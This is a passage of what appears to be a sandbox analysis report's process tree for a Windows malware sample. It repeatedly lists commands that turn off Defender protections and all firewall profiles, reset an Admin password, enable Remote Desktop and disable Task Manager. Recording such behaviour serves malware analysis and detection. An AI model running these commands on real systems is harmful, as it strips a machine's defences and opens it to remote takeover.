        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        34⤵
        
        PID:9924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        34⤵
        
        PID:6756
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        32⤵
        
        PID:6444
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        33⤵
        
        PID:6360
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        32⤵
        
        PID:6276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        32⤵
        
        PID:7148
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        32⤵
        
        PID:5532
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        32⤵
        
        PID:1260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        32⤵
        
        PID:6028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        32⤵
        
        PID:6416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        32⤵
        
        PID:6512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        32⤵
        
        PID:7736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        32⤵
        
        PID:6868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        32⤵
        
        PID:7536
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        32⤵
        
        PID:540
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        32⤵
        
        PID:1600
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        32⤵
        
        PID:8684
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        32⤵
        
        PID:7568
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        32⤵
        
        PID:6288
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        32⤵
        Modifies Windows Firewall
        
        PID:1820
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        32⤵
        
        PID:8336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        32⤵
        
        PID:8400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        32⤵
        
        PID:9792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        32⤵
        
        PID:8988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        32⤵
        
        PID:4996
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        30⤵
        
        PID:6460
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        31⤵
        
        PID:6204
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        30⤵
        
        PID:5440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        30⤵
        
        PID:7036
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        30⤵
        
        PID:5624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        30⤵
        
        PID:5648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        30⤵
        
        PID:5576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        30⤵
        
        PID:6896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        30⤵
        
        PID:5692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        30⤵
        
        PID:6708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        30⤵
        
        PID:6720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        30⤵
        
        PID:5364
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        30⤵
        
        PID:2852
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        30⤵
        
        PID:6520
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        30⤵
        
        PID:4048
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        30⤵
        
        PID:5132
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        30⤵
        
        PID:7328
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        30⤵
        
        PID:6708
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        30⤵
        
        PID:7892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        30⤵
        
        PID:7424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        30⤵
        
        PID:7176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        30⤵
        
        PID:8312
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        28⤵
        
        PID:4424
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        29⤵
        
        PID:6796
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        28⤵
        
        PID:4452
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        28⤵
        
        PID:3272
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        28⤵
        
        PID:6444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        28⤵
        
        PID:4424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        28⤵
        
        PID:5644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        28⤵
        
        PID:6220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        28⤵
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        28⤵
        
        PID:4408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        28⤵
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        28⤵
        
        PID:8028
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        28⤵
        
        PID:8204
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        28⤵
        
        PID:8480
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        28⤵
        Modifies Windows Firewall
        
        PID:9012
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        28⤵
        Modifies Windows Firewall
        
        PID:7308
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        28⤵
        
        PID:7576
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        28⤵
        
        PID:3032
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        28⤵
        
        PID:7372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        28⤵
        
        PID:7488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        28⤵
        
        PID:8704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        28⤵
        
        PID:4952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        28⤵
        
        PID:9296
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        26⤵
        
        PID:6776
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        27⤵
        
        PID:6840
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        26⤵
        
        PID:7060
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        26⤵
        
        PID:7076
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        26⤵
        
        PID:1692
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        26⤵
        
        PID:6664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        26⤵
        
        PID:6052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        26⤵
        
        PID:6740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        26⤵
        
        PID:6972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        26⤵
        
        PID:7960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        26⤵
        
        PID:2808
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        26⤵
        
        PID:6348
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        26⤵
        Modifies Windows Firewall
        
        PID:1552
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        26⤵
        
        PID:8328
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        26⤵
        
        PID:4624
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        26⤵
        Modifies Windows Firewall
        
        PID:5204
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        26⤵
        
        PID:8400
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        26⤵
        
        PID:6528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        26⤵
        
        PID:7496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        26⤵
        
        PID:4048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        26⤵
        
        PID:9756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        26⤵
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        26⤵
        
        PID:3588
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        24⤵
        
        PID:5776
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        25⤵
        
        PID:5436
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        24⤵
        
        PID:6444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        24⤵
        
        PID:6740
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        24⤵
        
        PID:6968
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        24⤵
        
        PID:7116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        24⤵
        
        PID:7144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        24⤵
        
        PID:6996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        24⤵
        
        PID:6604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        24⤵
        
        PID:1840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        24⤵
        
        PID:7932
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        24⤵
        Modifies Windows Firewall
        
        PID:3988
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        24⤵
        
        PID:6780
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        24⤵
        
        PID:1600
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        24⤵
        
        PID:4648
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        24⤵
        
        PID:8128
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        24⤵
        
        PID:5620
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        24⤵
        
        PID:8132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        24⤵
        
        PID:8568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        24⤵
        
        PID:8408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        24⤵
        
        PID:7244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        24⤵
        
        PID:5964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        24⤵
        
        PID:8140
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        22⤵
        
        PID:6052
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        23⤵
        
        PID:5396
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        22⤵
        
        PID:5696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        22⤵
        
        PID:5440
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        22⤵
        
        PID:6152
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        22⤵
        
        PID:6216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        22⤵
        
        PID:6276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        22⤵
        
        PID:5856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        22⤵
        
        PID:7020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        22⤵
        
        PID:7164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        22⤵
        
        PID:7548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        22⤵
        
        PID:5160
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        22⤵
        
        PID:636
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        22⤵
        
        PID:6180
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        22⤵
        Modifies Windows Firewall
        
        PID:3308
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        22⤵
        
        PID:6524
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        22⤵
        
        PID:4944
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        22⤵
        Modifies Windows Firewall
        
        PID:4944
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        22⤵
        
        PID:6492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        22⤵
        
        PID:8828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        22⤵
        
        PID:8640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        22⤵
        
        PID:8404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        22⤵
        
        PID:10176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        22⤵
        
        PID:9932
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        20⤵
        
        PID:5304
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        21⤵
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        20⤵
        
        PID:5544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        20⤵
        
        PID:5260
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        20⤵
        
        PID:5520
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        20⤵
        
        PID:5408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        20⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        20⤵
        
        PID:7124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        20⤵
        
        PID:6264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        20⤵
        
        PID:6436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        20⤵
        
        PID:6816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        20⤵
        
        PID:4184
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        20⤵
        
        PID:6396
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        20⤵
        Modifies Windows Firewall
        
        PID:4216
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        20⤵
        Modifies Windows Firewall
        
        PID:5692
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        20⤵
        
        PID:4804
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        20⤵
        Modifies Windows Firewall
        
        PID:8160
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        20⤵
        
        PID:7524
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        20⤵
        
        PID:8144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        20⤵
        
        PID:6248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        20⤵
        
        PID:7724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        20⤵
        
        PID:6216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        20⤵
        
        PID:6152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        20⤵
        
        PID:1732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        20⤵
        
        PID:8980
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        18⤵
        
        PID:1736
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        19⤵
        
        PID:5684
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        18⤵
        
        PID:5612
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        18⤵
        
        PID:5256
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        18⤵
        
        PID:6064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        18⤵
        
        PID:6100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        18⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        18⤵
        
        PID:6484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        18⤵
        
        PID:6564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        18⤵
        
        PID:6160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5576
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode disable
        18⤵
        
        PID:8012
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=DISABLE
        18⤵
        Modifies Windows Firewall
        
        PID:6024
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        18⤵
        
        PID:6248
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set domainprofile state off
        18⤵
        
        PID:4404
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set privateprofile state off
        18⤵
        
        PID:6660
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set publicprofile state off
        18⤵
        
        PID:7716
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        18⤵
        
        PID:3312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        18⤵
        
        PID:2956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        18⤵
        
        PID:8148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        18⤵
        
        PID:8196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
        18⤵
        
        PID:8196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
        18⤵
        
        PID:7592
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        16⤵
        
        PID:2288
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        17⤵
        
        PID:6056
        
        C:\Windows\system32\reg.exe
        
